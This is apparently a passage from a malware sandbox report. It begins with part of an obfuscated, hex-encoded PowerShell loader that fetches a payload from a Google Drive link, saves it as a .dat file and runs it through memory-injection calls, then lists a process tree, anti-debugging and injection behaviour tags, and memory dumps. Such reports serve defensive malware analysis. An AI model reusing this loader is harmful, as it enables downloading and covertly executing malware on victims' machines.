'34567562797562302D3034757E64717D7F753E597E667F7B75384B597E644064624D2A2A4A75627F3C3029212822202023223C302068232020203C3020682439';.($tabulator7) $Immerging8;$Udvidend01 = 'https://drive.google.com/uc?export=download&id=1-WQl_IuA-mYLU2KIuYz-IB-5GgJqjQQP';$Udvidend00 = Udvidend11 '344364717463647A75212128302D30385E75673D5F727A757364305E75643E477572537C79757E64393E547F677E7C7F7174436462797E7738344574667974757E74202139';$Immerging8 = Udvidend11 '34637F7379717C7D757479222D34757E662A71606074716471';.($tabulator7) $Immerging8;$socialmedi2=$socialmedi2+'\Potentialn.dat';$Stadstje118='';if (-not(Test-Path $socialmedi2)) {while ($Stadstje118 -eq '') {.($tabulator7) $Udvidend00;Start-Sleep 5;}Set-Content $socialmedi2 $Stadstje118;}$Stadstje118 = Get-Content $socialmedi2;$Immerging9 = Udvidend11 '34597D7D756277797E77302D304B43696364757D3E537F7E667562644D2A2A56627F7D527163752624436462797E7738344364717463647A7521212839';.($tabulator7) $Immerging9;$Stadstje1180 = Udvidend11 '4B43696364757D3E42657E64797D753E597E6475627F6043756266797375633E5D71626378717C4D2A2A537F60693834597D7D756277797E773C30203C303034637F7379717C7D757479233C3026252239';.($tabulator7) $Stadstje1180;$Udlednings=$Immerging.count-652;$Stadstje1181 = Udvidend11 '4B43696364757D3E42657E64797D753E597E6475627F6043756266797375633E5D71626378717C4D2A2A537F60693834597D7D756277797E773C302625223C30345675627975623C303445747C75747E797E776339';.($tabulator7) $Stadstje1181;$Stadstje1182 = Udvidend11 '344275737F7E7475222120302D304B43696364757D3E42657E64797D753E597E6475627F6043756266797375633E5D71626378717C4D2A2A57756454757C7577716475567F6256657E7364797F7E407F797E6475623838767B603034557C757B64627F7B30345F6675627E71647E79393C30385754443050384B597E644064624D3C304B597E644064624D3C304B597E644064624D3C304B597E644064624D3C304B597E644064624D3930384B597E644064624D393939';.($tabulator7) $Stadstje1182;$Stadstje1183 = Udvidend11 '344275737F7E74752221203E597E667F7B753834637F7379717C7D757479233C345675627975623C34566573713C203C2039';.($tabulator7) $Stadstje1183#"3⤵
- Blocklisted process makes network request
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1740 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe"4⤵
- Checks QEMU agent file
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:2348 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2348 -s 22405⤵
- Program crash
PID:428
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2348 -ip 23481⤵PID:3380
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/1412-132-0x0000000000000000-mapping.dmp
-
memory/1740-150-0x0000000007FC0000-0x000000000D751000-memory.dmpFilesize
87.6MB
-
memory/1740-136-0x0000000000000000-mapping.dmp
-
memory/1740-163-0x0000000007FC0000-0x000000000D751000-memory.dmpFilesize
87.6MB
-
memory/1740-156-0x0000000077CA0000-0x0000000077E43000-memory.dmpFilesize
1.6MB
-
memory/1740-154-0x0000000077CA0000-0x0000000077E43000-memory.dmpFilesize
1.6MB
-
memory/1740-138-0x0000000002840000-0x0000000002876000-memory.dmpFilesize
216KB
-
memory/1740-139-0x0000000005400000-0x0000000005A28000-memory.dmpFilesize
6.2MB
-
memory/1740-140-0x0000000005290000-0x00000000052B2000-memory.dmpFilesize
136KB
-
memory/1740-141-0x0000000005330000-0x0000000005396000-memory.dmpFilesize
408KB
-
memory/1740-142-0x0000000005AA0000-0x0000000005B06000-memory.dmpFilesize
408KB
-
memory/1740-143-0x0000000006160000-0x000000000617E000-memory.dmpFilesize
120KB
-
memory/1740-144-0x0000000007940000-0x0000000007FBA000-memory.dmpFilesize
6.5MB
-
memory/1740-145-0x0000000007270000-0x000000000728A000-memory.dmpFilesize
104KB
-
memory/1740-146-0x0000000007400000-0x0000000007496000-memory.dmpFilesize
600KB
-
memory/1740-147-0x00000000073A0000-0x00000000073C2000-memory.dmpFilesize
136KB
-
memory/1740-148-0x000000000DD10000-0x000000000E2B4000-memory.dmpFilesize
5.6MB
-
memory/1740-152-0x0000000077CA0000-0x0000000077E43000-memory.dmpFilesize
1.6MB
-
memory/1740-151-0x00007FFFECBB0000-0x00007FFFECDA5000-memory.dmpFilesize
2.0MB
-
memory/2348-169-0x0000000000D00000-0x0000000006491000-memory.dmpFilesize
87.6MB
-
memory/2348-165-0x0000000025950000-0x00000000259E2000-memory.dmpFilesize
584KB
-
memory/2348-162-0x0000000000400000-0x0000000000430000-memory.dmpFilesize
192KB
-
memory/2348-160-0x0000000000401000-0x000000000062B000-memory.dmpFilesize
2.2MB
-
memory/2348-155-0x0000000000D00000-0x0000000006491000-memory.dmpFilesize
87.6MB
-
memory/2348-168-0x0000000077CA0000-0x0000000077E43000-memory.dmpFilesize
1.6MB
-
memory/2348-157-0x00007FFFECBB0000-0x00007FFFECDA5000-memory.dmpFilesize
2.0MB
-
memory/2348-167-0x00007FFFECBB0000-0x00007FFFECDA5000-memory.dmpFilesize
2.0MB
-
memory/2348-159-0x0000000000400000-0x000000000062B000-memory.dmpFilesize
2.2MB
-
memory/2348-153-0x0000000000000000-mapping.dmp
-
memory/2348-166-0x0000000024DF0000-0x0000000024DFA000-memory.dmpFilesize
40KB
-
memory/2348-158-0x0000000077CA0000-0x0000000077E43000-memory.dmpFilesize
1.6MB
-
memory/4380-164-0x00007FFFCDCD0000-0x00007FFFCE791000-memory.dmpFilesize
10.8MB
-
memory/4380-149-0x00007FFFCDCD0000-0x00007FFFCE791000-memory.dmpFilesize
10.8MB
-
memory/4380-137-0x00007FFFCDCD0000-0x00007FFFCE791000-memory.dmpFilesize
10.8MB
-
memory/4380-135-0x00000226CA5F0000-0x00000226CA612000-memory.dmpFilesize
136KB
-
memory/4380-134-0x0000000000000000-mapping.dmp
-
memory/5072-133-0x0000000000000000-mapping.dmp